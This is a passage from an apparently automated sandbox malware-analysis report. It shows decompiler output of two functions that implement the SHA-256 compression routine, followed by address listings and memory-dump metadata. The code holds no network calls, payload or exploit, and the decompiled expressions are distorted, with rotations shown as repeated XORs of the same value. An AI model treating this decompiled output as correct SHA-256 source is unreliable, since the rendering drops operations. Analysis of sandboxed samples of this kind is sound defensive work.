				unsigned int _t303;
				signed int _t304;
				signed int _t311;
				signed int _t312;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t324;
				signed int _t333;
				unsigned int _t361;
				signed int _t362;
				signed int _t369;
				unsigned int _t375;
				signed int _t376;
				signed int _t383;
				signed int _t386;
				signed int _t390;
				signed int _t405;
				signed int _t417;
				signed int _t429;
				signed int _t435;
				intOrPtr _t449;
				void* _t464;
				void* _t473;
				void* _t485;
				void* _t498;
				signed int _t499;
				signed int _t500;
				signed int _t541;
				signed int* _t543;

				_t543 =  &_v332;
				_t248 = __ecx[1];
				_t500 = __ecx[4];
				_v296 = __edx;
				_t435 = __ecx[2];
				_t386 =  *__ecx;
				_v312 = __ecx[3];
				_t323 = __ecx[5];
				_v260 = __ecx;
				_t276 = __ecx[7];
				_v332 = _t248;
				_v320 = _t435;
				_v324 = _t323;
				_v328 = __ecx[6];
				_v316 = _t276;
				if(_a4 != 0) {
					_v284 = _t248;
					_v276 = _v312;
					_t274 =  &_v200;
					_v264 = _t386;
					_v268 = _t435;
					_v292 = _t500;
					_v288 = _t323;
					_v280 = _v328;
					_v272 = _t276;
					do {
						_t277 = 0;
						while(1) {
							_t252 =  *((intOrPtr*)(_t277 + _v296));
							asm("bswap eax");
							_v300 = _t252;
							 *((intOrPtr*)(_t543 + _t277 + 0x5c)) = _t252;
							asm("ror eax, 0x19");
							asm("ror esi, 0xb");
							asm("ror esi, 0x6");
							_t324 = _v328;
							_t36 = _t277 + 0xb8fc00; // 0x428a2f98
							_t259 = (_t500 ^ _t500 ^ _t500) + ((_v328 ^ _t323) & _t500 ^ _t324) +  *_t36 + _v300 + _v316;
							_v316 = _t324;
							_v328 = _v324;
							_v308 = _v312 + _t259;
							asm("ror edx, 0x16");
							asm("ror esi, 0xd");
							asm("ror esi, 0x2");
							_v324 = _t500;
							_v304 = _t259 + ((_v332 | _t386) & _v320 | _v332 & _t386) + (_t386 ^ _t386 ^ _t386);
							_t449 =  *((intOrPtr*)(_t277 + _v296 + 4));
							_v312 = _v320;
							_v320 = _v332;
							_t333 = _v308;
							_v332 = _t386;
							asm("ror eax, 0x19");
							asm("ror edi, 0xb");
							asm("ror edi, 0x6");
							_t390 = _v328;
							_t61 = _t277 + 0xb8fc04; // 0x71374491
							asm("bswap esi");
							_t269 = (_t333 ^ _t333 ^ _t333) + ((_v328 ^ _v324) & _t333 ^ _t390) +  *_t61 + _t449 + _v316;
							 *((intOrPtr*)(_t543 + _t277 + 0x60)) = _t449;
							_v324 = _t333;
							_t500 = _t269 + _v312;
							_v328 = _v324;
							_v316 = _t390;
							asm("ror esi, 0x16");
							asm("ror edi, 0xd");
							asm("ror edi, 0x2");
							_t277 = _t277 + 8;
							_v312 = _v320;
							_t386 = ((_v332 | _v304) & _v320 | _v332 & _v304) + _t269 + (_v304 ^ _v304 ^ _v304);
							_v320 = _v332;
							_v332 = _v304;
							if(_t277 >= 0x40) {
								break;
							}
							_t323 = _v324;
						}
						_t272 = 0x40;
						while(1) {
							asm("ror edx, 0x13");
							asm("ror esi, 0x11");
							asm("ror esi, 0x12");
							asm("ror ecx, 0x7");
							_t284 =  *((intOrPtr*)(_t274 + _t272 - 0x54)) + ( *(_t274 + _t272 - 0x40) ^  *(_t274 + _t272 - 0x40) ^  *(_t274 + _t272 - 0x40) >> 0x0000000a) + ( *(_t274 + _t272 - 0x74) ^  *(_t274 + _t272 - 0x74) ^  *(_t274 + _t272 - 0x74) >> 0x00000003) +  *((intOrPtr*)(_t274 + _t272 - 0x78));
							_v304 = _t284;
							 *((intOrPtr*)(_t543 + _t272 + 0x5c)) = _t284;
							asm("ror esi, 0x19");
							asm("ror edx, 0xb");
							asm("ror ecx, 0x6");
							_t286 = _v328;
							_t99 = _t272 + 0xb8fc00; // 0xe49b69c1
							_t464 = (_t500 ^ _t500 ^ _t500) + ((_v328 ^ _v324) & _t500 ^ _t286) +  *_t99 + _v304 + _v316;
							_v316 = _t286;
							_v328 = _v324;
							_v308 = _t464 + _v312;
							asm("ror edx, 0x16");
							asm("ror ecx, 0xd");
							asm("ror ecx, 0x2");
							_v324 = _t500;
							_t296 = ((_v332 | _t386) & _v320 | _v332 & _t386) + _t464 + (_t386 ^ _t386 ^ _t386);
							_v312 = _v320;
							_v320 = _v332;
							_v332 = _t386;
							asm("ror edi, 0x13");
							asm("ror ebp, 0x11");
							asm("ror edx, 0x12");
							asm("ror ebp, 0x7");
							_t361 =  *(_t274 + _t272 - 0x74) + ( *(_t274 + _t272 - 0x3c) ^  *(_t274 + _t272 - 0x3c) ^  *(_t274 + _t272 - 0x3c) >> 0x0000000a) + ( *(_t274 + _t272 - 0x70) ^  *(_t274 + _t272 - 0x70) ^  *(_t274 + _t272 - 0x70) >> 0x00000003) +  *((intOrPtr*)(_t274 + _t272 - 0x50));
							_v300 = _t361;
							 *((intOrPtr*)(_t543 + _t272 + 0x60)) = _t361;
							_t362 = _v308;
							asm("ror esi, 0x19");
							asm("ror edi, 0xb");
							asm("ror edi, 0x6");
							_t405 = _v328;
							_t132 = _t272 + 0xb8fc04; // 0xefbe4786
							_t473 = (_t362 ^ _t362 ^ _t362) + ((_v328 ^ _v324) & _t362 ^ _t405) +  *_t132 + _v300 + _v316;
							_v316 = _t405;
							_v324 = _t362;
							_v328 = _v324;
							asm("ror edi, 0x16");
							_v308 = _v312 + _t473;
							asm("ror edx, 0xd");
							asm("ror edx, 0x2");
							_v312 = _v320;
							_v332 = _t296;
							_t369 = (_t296 ^ _t296 ^ _t296) + ((_v332 | _t296) & _v320 | _v332 & _t296) + _t473;
							asm("ror edi, 0x12");
							_v320 = _v332;
							asm("ror esi, 0x7");
							asm("ror ecx, 0x13");
							asm("ror ebp, 0x11");
							_t303 =  *(_t274 + _t272 - 0x70) + ( *(_t274 + _t272 - 0x6c) ^  *(_t274 + _t272 - 0x6c) ^  *(_t274 + _t272 - 0x6c) >> 0x00000003) + (_v304 ^ _v304 ^ _v304 >> 0x0000000a) +  *((intOrPtr*)(_t274 + _t272 - 0x4c));
							_v304 = _t303;
							 *((intOrPtr*)(_t543 + _t272 + 0x64)) = _t303;
							_t304 = _v308;
							asm("ror esi, 0x19");
							asm("ror edi, 0xb");
							asm("ror edi, 0x6");
							_t417 = _v328;
							_t163 = _t272 + 0xb8fc08; // 0xfc19dc6
							_t485 = (_t304 ^ _t304 ^ _t304) + ((_v328 ^ _v324) & _t304 ^ _t417) +  *_t163 + _v304 + _v316;
							_v316 = _t417;
							_v328 = _v324;
							_v324 = _t304;
							asm("ror edi, 0x16");
							_v308 = _v312 + _t485;
							asm("ror ecx, 0xd");
							asm("ror ecx, 0x2");
							_v312 = _v320;
							_t311 = (_t369 ^ _t369 ^ _t369) + ((_v332 | _t369) & _v320 | _v332 & _t369) + _t485;
							_v320 = _v332;
							asm("ror edi, 0x12");
							_v332 = _t369;
							asm("ror edx, 0x7");
							asm("ror edx, 0x13");
							asm("ror ebp, 0x11");
							_t375 =  *(_t274 + _t272 - 0x6c) + ( *(_t274 + _t272 - 0x68) ^  *(_t274 + _t272 - 0x68) ^  *(_t274 + _t272 - 0x68) >> 0x00000003) + (_v300 ^ _v300 ^ _v300 >> 0x0000000a) +  *((intOrPtr*)(_t274 + _t272 - 0x48));
							_v300 = _t375;
							 *((intOrPtr*)(_t543 + _t272 + 0x68)) = _t375;
							_t376 = _v308;
							asm("ror esi, 0x19");
							asm("ror edi, 0xb");
							asm("ror edi, 0x6");
							_t429 = _v328;
							_t194 = _t272 + 0xb8fc0c; // 0x240ca1cc
							_t498 = (_t376 ^ _t376 ^ _t376) + ((_v328 ^ _v324) & _t376 ^ _t429) +  *_t194 + _v300 + _v316;
							_v316 = _t429;
							_v324 = _t376;
							_v308 = _v312 + _t498;
							_v328 = _v324;
							asm("ror edi, 0x16");
							asm("ror edx, 0xd");
							asm("ror edx, 0x2");
							_t383 = _v332;
							_t499 = _v320;
							_t272 = _t272 + 0x10;
							_t386 = (_t311 ^ _t311 ^ _t311) + ((_v332 | _t311) & _v320 | _v332 & _t311) + _t498;
							_v312 = _t499;
							_v320 = _t383;
							_v332 = _t311;
							if(_t272 >= 0x100) {
								goto L8;
							}
							_t500 = _v308;
						}
						L8:
						_t248 = _v260;
						_t541 = _v284 + _t311;
						_t386 = _t386 + _v264;
						_v296 = _v296 + 0x40;
						_t312 = _t541;
						_v332 = _t312;
						 *(_t248 + 4) = _t312;
						_t314 = _v268 + _t383;
						_t323 = _v288 + _v324;
						_v268 = _t314;
						_v320 = _t314;
						 *(_t248 + 8) = _t314;
						_t316 = _v276 + _t499;
						_v276 = _t316;
						_v312 = _t316;
						 *(_t248 + 0xc) = _t316;
						_t318 = _v280 + _v328;
						_v284 = _t541;
						_t500 = _v292 + _v308;
						_v280 = _t318;
						_v328 = _t318;
						 *(_t248 + 0x18) = _t318;
						_t320 = _v272 + _v316;
						_t237 =  &_a4;
						 *_t237 = _a4 - 1;
						_v264 = _t386;
						 *_t248 = _t386;
						_v292 = _t500;
						 *(_t248 + 0x10) = _t500;
						_v288 = _t323;
						_v324 = _t323;
						 *(_t248 + 0x14) = _t323;
						_v272 = _t320;
						_v316 = _t320;
						 *(_t248 + 0x1c) = _t320;
					} while ( *_t237 != 0);
				}
				return _t248;
			}


































































                                                                                                                    0x00b7e960
                                                                                                                    0x00b7e96e
                                                                                                                    0x00b7e976
                                                                                                                    0x00b7e979
                                                                                                                    0x00b7e981
                                                                                                                    0x00b7e985
                                                                                                                    0x00b7e987
                                                                                                                    0x00b7e98b
                                                                                                                    0x00b7e98e
                                                                                                                    0x00b7e992
                                                                                                                    0x00b7e995
                                                                                                                    0x00b7e999
                                                                                                                    0x00b7e99d
                                                                                                                    0x00b7e9a1
                                                                                                                    0x00b7e9a5
                                                                                                                    0x00b7e9a9
                                                                                                                    0x00b7e9af
                                                                                                                    0x00b7e9b7
                                                                                                                    0x00b7e9bf
                                                                                                                    0x00b7e9c6
                                                                                                                    0x00b7e9ca
                                                                                                                    0x00b7e9ce
                                                                                                                    0x00b7e9d2
                                                                                                                    0x00b7e9d6
                                                                                                                    0x00b7e9da
                                                                                                                    0x00b7e9e0
                                                                                                                    0x00b7e9e0
                                                                                                                    0x00b7e9e8
                                                                                                                    0x00b7e9ec
                                                                                                                    0x00b7e9ef
                                                                                                                    0x00b7e9f1
                                                                                                                    0x00b7e9f5
                                                                                                                    0x00b7e9fb
                                                                                                                    0x00b7ea00
                                                                                                                    0x00b7ea07
                                                                                                                    0x00b7ea12
                                                                                                                    0x00b7ea1c
                                                                                                                    0x00b7ea28
                                                                                                                    0x00b7ea2c
                                                                                                                    0x00b7ea34
                                                                                                                    0x00b7ea3e
                                                                                                                    0x00b7ea44
                                                                                                                    0x00b7ea47
                                                                                                                    0x00b7ea4e
                                                                                                                    0x00b7ea5d
                                                                                                                    0x00b7ea79
                                                                                                                    0x00b7ea81
                                                                                                                    0x00b7ea85
                                                                                                                    0x00b7ea8d
                                                                                                                    0x00b7ea91
                                                                                                                    0x00b7ea95
                                                                                                                    0x00b7ea9b
                                                                                                                    0x00b7eaa0
                                                                                                                    0x00b7eaa7
                                                                                                                    0x00b7eaac
                                                                                                                    0x00b7eab6
                                                                                                                    0x00b7eabc
                                                                                                                    0x00b7eac0
                                                                                                                    0x00b7eac4
                                                                                                                    0x00b7eacc
                                                                                                                    0x00b7ead4
                                                                                                                    0x00b7eadb
                                                                                                                    0x00b7eadf
                                                                                                                    0x00b7eae5
                                                                                                                    0x00b7eaea
                                                                                                                    0x00b7eaf1
                                                                                                                    0x00b7eb08
                                                                                                                    0x00b7eb17
                                                                                                                    0x00b7eb1f
                                                                                                                    0x00b7eb21
                                                                                                                    0x00b7eb25
                                                                                                                    0x00b7eb2c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7e9e4
                                                                                                                    0x00b7e9e4
                                                                                                                    0x00b7eb32
                                                                                                                    0x00b7eb44
                                                                                                                    0x00b7eb4a
                                                                                                                    0x00b7eb52
                                                                                                                    0x00b7eb5f
                                                                                                                    0x00b7eb62
                                                                                                                    0x00b7eb7a
                                                                                                                    0x00b7eb7c
                                                                                                                    0x00b7eb80
                                                                                                                    0x00b7eb86
                                                                                                                    0x00b7eb8b
                                                                                                                    0x00b7eb9a
                                                                                                                    0x00b7eb9f
                                                                                                                    0x00b7eba9
                                                                                                                    0x00b7ebb7
                                                                                                                    0x00b7ebbb
                                                                                                                    0x00b7ebc3
                                                                                                                    0x00b7ebca
                                                                                                                    0x00b7ebd0
                                                                                                                    0x00b7ebd5
                                                                                                                    0x00b7ebdc
                                                                                                                    0x00b7ebeb
                                                                                                                    0x00b7ebfd
                                                                                                                    0x00b7ec03
                                                                                                                    0x00b7ec0b
                                                                                                                    0x00b7ec13
                                                                                                                    0x00b7ec19
                                                                                                                    0x00b7ec1e
                                                                                                                    0x00b7ec2a
                                                                                                                    0x00b7ec2f
                                                                                                                    0x00b7ec43
                                                                                                                    0x00b7ec4d
                                                                                                                    0x00b7ec51
                                                                                                                    0x00b7ec55
                                                                                                                    0x00b7ec5d
                                                                                                                    0x00b7ec62
                                                                                                                    0x00b7ec69
                                                                                                                    0x00b7ec6e
                                                                                                                    0x00b7ec76
                                                                                                                    0x00b7ec80
                                                                                                                    0x00b7ec84
                                                                                                                    0x00b7ec8c
                                                                                                                    0x00b7ec96
                                                                                                                    0x00b7ec9c
                                                                                                                    0x00b7ec9f
                                                                                                                    0x00b7eca5
                                                                                                                    0x00b7ecac
                                                                                                                    0x00b7ecc7
                                                                                                                    0x00b7eccf
                                                                                                                    0x00b7ecd7
                                                                                                                    0x00b7ecdc
                                                                                                                    0x00b7ecdf
                                                                                                                    0x00b7ece8
                                                                                                                    0x00b7ecf5
                                                                                                                    0x00b7ecfa
                                                                                                                    0x00b7ed0e
                                                                                                                    0x00b7ed10
                                                                                                                    0x00b7ed14
                                                                                                                    0x00b7ed18
                                                                                                                    0x00b7ed20
                                                                                                                    0x00b7ed23
                                                                                                                    0x00b7ed34
                                                                                                                    0x00b7ed39
                                                                                                                    0x00b7ed41
                                                                                                                    0x00b7ed4b
                                                                                                                    0x00b7ed4f
                                                                                                                    0x00b7ed57
                                                                                                                    0x00b7ed5b
                                                                                                                    0x00b7ed67
                                                                                                                    0x00b7ed6a
                                                                                                                    0x00b7ed70
                                                                                                                    0x00b7ed77
                                                                                                                    0x00b7ed92
                                                                                                                    0x00b7ed9a
                                                                                                                    0x00b7ed9d
                                                                                                                    0x00b7eda7
                                                                                                                    0x00b7edaa
                                                                                                                    0x00b7edb0
                                                                                                                    0x00b7edc2
                                                                                                                    0x00b7edc5
                                                                                                                    0x00b7ede1
                                                                                                                    0x00b7ede3
                                                                                                                    0x00b7ede7
                                                                                                                    0x00b7edeb
                                                                                                                    0x00b7edf1
                                                                                                                    0x00b7edf6
                                                                                                                    0x00b7edfd
                                                                                                                    0x00b7ee02
                                                                                                                    0x00b7ee0c
                                                                                                                    0x00b7ee16
                                                                                                                    0x00b7ee1a
                                                                                                                    0x00b7ee22
                                                                                                                    0x00b7ee2c
                                                                                                                    0x00b7ee30
                                                                                                                    0x00b7ee36
                                                                                                                    0x00b7ee3b
                                                                                                                    0x00b7ee42
                                                                                                                    0x00b7ee57
                                                                                                                    0x00b7ee5d
                                                                                                                    0x00b7ee61
                                                                                                                    0x00b7ee64
                                                                                                                    0x00b7ee66
                                                                                                                    0x00b7ee6a
                                                                                                                    0x00b7ee6e
                                                                                                                    0x00b7ee77
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b7eb40
                                                                                                                    0x00b7eb40
                                                                                                                    0x00b7ee7d
                                                                                                                    0x00b7ee7d
                                                                                                                    0x00b7ee85
                                                                                                                    0x00b7ee87
                                                                                                                    0x00b7ee8b
                                                                                                                    0x00b7ee90
                                                                                                                    0x00b7ee92
                                                                                                                    0x00b7ee96
                                                                                                                    0x00b7ee9d
                                                                                                                    0x00b7eea3
                                                                                                                    0x00b7eea7
                                                                                                                    0x00b7eeab
                                                                                                                    0x00b7eeaf
                                                                                                                    0x00b7eeb6
                                                                                                                    0x00b7eeb8
                                                                                                                    0x00b7eebc
                                                                                                                    0x00b7eec0
                                                                                                                    0x00b7eec7
                                                                                                                    0x00b7eecb
                                                                                                                    0x00b7eed3
                                                                                                                    0x00b7eed7
                                                                                                                    0x00b7eedb
                                                                                                                    0x00b7eedf
                                                                                                                    0x00b7eee6
                                                                                                                    0x00b7eeea
                                                                                                                    0x00b7eeea
                                                                                                                    0x00b7eef1
                                                                                                                    0x00b7eef5
                                                                                                                    0x00b7eef7
                                                                                                                    0x00b7eefb
                                                                                                                    0x00b7eefe
                                                                                                                    0x00b7ef02
                                                                                                                    0x00b7ef06
                                                                                                                    0x00b7ef09
                                                                                                                    0x00b7ef0d
                                                                                                                    0x00b7ef11
                                                                                                                    0x00b7ef11
                                                                                                                    0x00b7e9e0
                                                                                                                    0x00b7ef24

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: a2473370747aa576e0ce985de0b37070c4b9408777e3307f6b9683a3848bdcee
                                                                                                                    • Instruction ID: 9edf8de04a7919beeac7480aa1cabef6037cfe4efe3646a2a1885220909c1cdf
                                                                                                                    • Opcode Fuzzy Hash: a2473370747aa576e0ce985de0b37070c4b9408777e3307f6b9683a3848bdcee
                                                                                                                    • Instruction Fuzzy Hash: 4312F8B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EF898A7311D770E9568B86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B7EB39 Relevance: 1.6, Strings: 1, Instructions: 324COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 65%
                                                                                                                    			E00B7EB39(void* __eax, void* __ebx, signed int __edi, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, unsigned int _a48, intOrPtr _a52, signed int _a56, signed int _a60, signed int _a64, signed int _a68, signed int _a72, signed int _a76, signed int _a80, signed int _a84, signed int* _a88, char _a352) {
				unsigned int _t223;
				void* _t230;
				void* _t240;
				void* _t243;
				signed int* _t244;
				void* _t245;
				void* _t247;
				signed int _t254;
				signed int _t256;
				signed int _t266;
				signed int _t273;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t301;
				unsigned int _t329;
				signed int _t330;
				signed int _t337;
				unsigned int _t343;
				signed int _t344;
				signed int _t351;
				signed int _t353;
				signed int _t356;
				signed int _t371;
				signed int _t383;
				signed int _t395;
				intOrPtr _t413;
				void* _t428;
				void* _t437;
				void* _t449;
				void* _t462;
				signed int _t463;
				signed int _t465;
				signed int _t506;
				void* _t509;

				_t353 = __edi;
				_t245 = __ebx;
				while(1) {
					L5:
					_t465 = _a40;
					while(1) {
						asm("ror edx, 0x13");
						asm("ror esi, 0x11");
						asm("ror esi, 0x12");
						asm("ror ecx, 0x7");
						_t254 =  *((intOrPtr*)(_t245 + _t243 - 0x54)) + ( *(_t245 + _t243 - 0x40) ^  *(_t245 + _t243 - 0x40) ^  *(_t245 + _t243 - 0x40) >> 0x0000000a) + ( *(_t245 + _t243 - 0x74) ^  *(_t245 + _t243 - 0x74) ^  *(_t245 + _t243 - 0x74) >> 0x00000003) +  *((intOrPtr*)(_t245 + _t243 - 0x78));
						_a44 = _t254;
						 *((intOrPtr*)(_t509 + _t243 + 0x5c)) = _t254;
						asm("ror esi, 0x19");
						asm("ror edx, 0xb");
						asm("ror ecx, 0x6");
						_t256 = _a20;
						_t72 = _t243 + 0xb8fc00; // 0xe49b69c1
						_t428 = (_t465 ^ _t465 ^ _t465) + ((_a20 ^ _a24) & _t465 ^ _t256) +  *_t72 + _a44 + _a32;
						_a32 = _t256;
						_a20 = _a24;
						_a40 = _t428 + _a36;
						asm("ror edx, 0x16");
						asm("ror ecx, 0xd");
						asm("ror ecx, 0x2");
						_a24 = _t465;
						_t266 = ((_a16 | _t353) & _a28 | _a16 & _t353) + _t428 + (_t353 ^ _t353 ^ _t353);
						_a36 = _a28;
						_a28 = _a16;
						_a16 = _t353;
						asm("ror edi, 0x13");
						asm("ror ebp, 0x11");
						asm("ror edx, 0x12");
						asm("ror ebp, 0x7");
						_t329 =  *(_t245 + _t243 - 0x74) + ( *(_t245 + _t243 - 0x3c) ^  *(_t245 + _t243 - 0x3c) ^  *(_t245 + _t243 - 0x3c) >> 0x0000000a) + ( *(_t245 + _t243 - 0x70) ^  *(_t245 + _t243 - 0x70) ^  *(_t245 + _t243 - 0x70) >> 0x00000003) +  *((intOrPtr*)(_t245 + _t243 - 0x50));
						_a48 = _t329;
						 *((intOrPtr*)(_t509 + _t243 + 0x60)) = _t329;
						_t330 = _a40;
						asm("ror esi, 0x19");
						asm("ror edi, 0xb");
						asm("ror edi, 0x6");
						_t371 = _a20;
						_t105 = _t243 + 0xb8fc04; // 0xefbe4786
						_t437 = (_t330 ^ _t330 ^ _t330) + ((_a20 ^ _a24) & _t330 ^ _t371) +  *_t105 + _a48 + _a32;
						_a32 = _t371;
						_a24 = _t330;
						_a20 = _a24;
						asm("ror edi, 0x16");
						_a40 = _a36 + _t437;
						asm("ror edx, 0xd");
						asm("ror edx, 0x2");
						_a36 = _a28;
						_a16 = _t266;
						_t337 = (_t266 ^ _t266 ^ _t266) + ((_a16 | _t266) & _a28 | _a16 & _t266) + _t437;
						asm("ror edi, 0x12");
						_a28 = _a16;
						asm("ror esi, 0x7");
						asm("ror ecx, 0x13");
						asm("ror ebp, 0x11");
						_t273 =  *(_t245 + _t243 - 0x70) + ( *(_t245 + _t243 - 0x6c) ^  *(_t245 + _t243 - 0x6c) ^  *(_t245 + _t243 - 0x6c) >> 0x00000003) + (_a44 ^ _a44 ^ _a44 >> 0x0000000a) +  *((intOrPtr*)(_t245 + _t243 - 0x4c));
						_a44 = _t273;
						 *((intOrPtr*)(_t509 + _t243 + 0x64)) = _t273;
						_t274 = _a40;
						asm("ror esi, 0x19");
						asm("ror edi, 0xb");
						asm("ror edi, 0x6");
						_t383 = _a20;
						_t136 = _t243 + 0xb8fc08; // 0xfc19dc6
						_t449 = (_t274 ^ _t274 ^ _t274) + ((_a20 ^ _a24) & _t274 ^ _t383) +  *_t136 + _a44 + _a32;
						_a32 = _t383;
						_a20 = _a24;
						_a24 = _t274;
						asm("ror edi, 0x16");
						_a40 = _a36 + _t449;
						asm("ror ecx, 0xd");
						asm("ror ecx, 0x2");
						_a36 = _a28;
						_t281 = (_t337 ^ _t337 ^ _t337) + ((_a16 | _t337) & _a28 | _a16 & _t337) + _t449;
						_a28 = _a16;
						asm("ror edi, 0x12");
						_a16 = _t337;
						asm("ror edx, 0x7");
						asm("ror edx, 0x13");
						asm("ror ebp, 0x11");
						_t343 =  *(_t245 + _t243 - 0x6c) + ( *(_t245 + _t243 - 0x68) ^  *(_t245 + _t243 - 0x68) ^  *(_t245 + _t243 - 0x68) >> 0x00000003) + (_a48 ^ _a48 ^ _a48 >> 0x0000000a) +  *((intOrPtr*)(_t245 + _t243 - 0x48));
						_a48 = _t343;
						 *((intOrPtr*)(_t509 + _t243 + 0x68)) = _t343;
						_t344 = _a40;
						asm("ror esi, 0x19");
						asm("ror edi, 0xb");
						asm("ror edi, 0x6");
						_t395 = _a20;
						_t167 = _t243 + 0xb8fc0c; // 0x240ca1cc
						_t462 = (_t344 ^ _t344 ^ _t344) + ((_a20 ^ _a24) & _t344 ^ _t395) +  *_t167 + _a48 + _a32;
						_a32 = _t395;
						_a24 = _t344;
						_a40 = _a36 + _t462;
						_a20 = _a24;
						asm("ror edi, 0x16");
						asm("ror edx, 0xd");
						asm("ror edx, 0x2");
						_t351 = _a16;
						_t463 = _a28;
						_t243 = _t243 + 0x10;
						_t353 = (_t281 ^ _t281 ^ _t281) + ((_a16 | _t281) & _a28 | _a16 & _t281) + _t462;
						_a36 = _t463;
						_a28 = _t351;
						_a16 = _t281;
						if(_t243 < 0x100) {
							goto L5;
						}
						_t244 = _a88;
						_t506 = _a64 + _t281;
						_t353 = _t353 + _a84;
						_a52 = _a52 + 0x40;
						_t282 = _t506;
						_a16 = _t282;
						_t244[1] = _t282;
						_t284 = _a80 + _t351;
						_t291 = _a60 + _a24;
						_a80 = _t284;
						_a28 = _t284;
						_t244[2] = _t284;
						_t286 = _a72 + _t463;
						_a72 = _t286;
						_a36 = _t286;
						_t244[3] = _t286;
						_t288 = _a68 + _a20;
						_a64 = _t506;
						_t465 = _a56 + _a40;
						_a68 = _t288;
						_a20 = _t288;
						_t244[6] = _t288;
						_t290 = _a76 + _a32;
						_t210 =  &_a352;
						 *_t210 = _a352 - 1;
						_a84 = _t353;
						 *_t244 = _t353;
						_a56 = _t465;
						_t244[4] = _t465;
						_a60 = _t291;
						_a24 = _t291;
						_t244[5] = _t291;
						_a76 = _t290;
						_a32 = _t290;
						_t244[7] = _t290;
						if( *_t210 != 0) {
							_t247 = 0;
							while(1) {
								_t223 =  *((intOrPtr*)(_t247 + _a52));
								asm("bswap eax");
								_a48 = _t223;
								 *((intOrPtr*)(_t509 + _t247 + 0x5c)) = _t223;
								asm("ror eax, 0x19");
								asm("ror esi, 0xb");
								asm("ror esi, 0x6");
								_t292 = _a20;
								_t9 = _t247 + 0xb8fc00; // 0x428a2f98
								_t230 = (_t465 ^ _t465 ^ _t465) + ((_a20 ^ _t291) & _t465 ^ _t292) +  *_t9 + _a48 + _a32;
								_a32 = _t292;
								_a20 = _a24;
								_a40 = _a36 + _t230;
								asm("ror edx, 0x16");
								asm("ror esi, 0xd");
								asm("ror esi, 0x2");
								_a24 = _t465;
								_a44 = _t230 + ((_a16 | _t353) & _a28 | _a16 & _t353) + (_t353 ^ _t353 ^ _t353);
								_t413 =  *((intOrPtr*)(_t247 + _a52 + 4));
								_a36 = _a28;
								_a28 = _a16;
								_t301 = _a40;
								_a16 = _t353;
								asm("ror eax, 0x19");
								asm("ror edi, 0xb");
								asm("ror edi, 0x6");
								_t356 = _a20;
								_t34 = _t247 + 0xb8fc04; // 0x71374491
								asm("bswap esi");
								_t240 = (_t301 ^ _t301 ^ _t301) + ((_a20 ^ _a24) & _t301 ^ _t356) +  *_t34 + _t413 + _a32;
								 *((intOrPtr*)(_t509 + _t247 + 0x60)) = _t413;
								_a24 = _t301;
								_t465 = _t240 + _a36;
								_a20 = _a24;
								_a32 = _t356;
								asm("ror esi, 0x16");
								asm("ror edi, 0xd");
								asm("ror edi, 0x2");
								_t247 = _t247 + 8;
								_a36 = _a28;
								_t353 = ((_a16 | _a44) & _a28 | _a16 & _a44) + _t240 + (_a44 ^ _a44 ^ _a44);
								_a28 = _a16;
								_a16 = _a44;
								if(_t247 >= 0x40) {
									break;
								}
								_t291 = _a24;
							}
							_t243 = 0x40;
							continue;
						}
						return _t244;
					}
				}
			}












































                                                                                                                    0x00b7eb39
                                                                                                                    0x00b7eb39
                                                                                                                    0x00b7eb40
                                                                                                                    0x00b7eb40
                                                                                                                    0x00b7eb40
                                                                                                                    0x00b7eb44
                                                                                                                    0x00b7eb4a
                                                                                                                    0x00b7eb52
                                                                                                                    0x00b7eb5f
                                                                                                                    0x00b7eb62
                                                                                                                    0x00b7eb7a
                                                                                                                    0x00b7eb7c
                                                                                                                    0x00b7eb80
                                                                                                                    0x00b7eb86
                                                                                                                    0x00b7eb8b
                                                                                                                    0x00b7eb9a
                                                                                                                    0x00b7eb9f
                                                                                                                    0x00b7eba9
                                                                                                                    0x00b7ebb7
                                                                                                                    0x00b7ebbb
                                                                                                                    0x00b7ebc3
                                                                                                                    0x00b7ebca
                                                                                                                    0x00b7ebd0
                                                                                                                    0x00b7ebd5
                                                                                                                    0x00b7ebdc
                                                                                                                    0x00b7ebeb
                                                                                                                    0x00b7ebfd
                                                                                                                    0x00b7ec03
                                                                                                                    0x00b7ec0b
                                                                                                                    0x00b7ec13
                                                                                                                    0x00b7ec19
                                                                                                                    0x00b7ec1e
                                                                                                                    0x00b7ec2a
                                                                                                                    0x00b7ec2f
                                                                                                                    0x00b7ec43
                                                                                                                    0x00b7ec4d
                                                                                                                    0x00b7ec51
                                                                                                                    0x00b7ec55
                                                                                                                    0x00b7ec5d
                                                                                                                    0x00b7ec62
                                                                                                                    0x00b7ec69
                                                                                                                    0x00b7ec6e
                                                                                                                    0x00b7ec76
                                                                                                                    0x00b7ec80
                                                                                                                    0x00b7ec84
                                                                                                                    0x00b7ec8c
                                                                                                                    0x00b7ec96
                                                                                                                    0x00b7ec9c
                                                                                                                    0x00b7ec9f
                                                                                                                    0x00b7eca5
                                                                                                                    0x00b7ecac
                                                                                                                    0x00b7ecc7
                                                                                                                    0x00b7eccf
